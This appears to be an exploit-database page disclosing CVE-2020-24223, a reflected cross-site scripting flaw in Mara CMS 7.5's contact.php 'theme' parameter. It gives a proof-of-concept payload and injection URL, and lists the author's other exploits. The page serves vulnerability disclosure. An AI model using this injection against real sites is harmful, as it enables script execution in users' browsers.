Now you can request a feature, improvement or collaborate with us.
Author
"George Tsimpidas"
Platform
php
Release date
2020-08-31
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | # Exploit Title: Mara CMS 7.5 - Reflective Cross-Site Scripting # Google Dork: NA # Date: 2020-08-01 # Exploit Author: George Tsimpidas # Vendor Homepage: https://sourceforge.net/projects/maracms/ # Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # Version: 7.5 # Tested on: Kali Linux(x64) # CVE : CVE-2020-24223 Mara CMS 7.5 suffers from a Reflected Cross Site Scripting vulnerability. Description : This Reflected XSS vulnerability allows any authenticated user to inject malicious code via the parameter contact.php?theme=<inject>. The vulnerability exists because the parameter is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser. PoC : Use Payload : seven69387';alert(1)//154 Path : http://localhost/contact.php?theme=< inject payload here> Injection Example : http://localhost/contact.php?theme=seven69387';alert(1)//154 |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-10-14 | "Guild Wars 2 - Insecure Folder Permissions" | local | windows | "George Tsimpidas" |
2020-10-13 | "Battle.Net 1.27.1.12428 - Insecure File Permissions" | local | windows | "George Tsimpidas" |
2020-10-12 | "Liman 0.7 - Cross-Site Request Forgery (Change Password)" | webapps | multiple | "George Tsimpidas" |
2020-10-12 | "Online Students Management System 1.0 - 'username' SQL Injections" | webapps | php | "George Tsimpidas" |
2020-08-31 | "Mara CMS 7.5 - Reflective Cross-Site Scripting" | webapps | php | "George Tsimpidas" |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48777/?format=json')
For full documentation follow the link above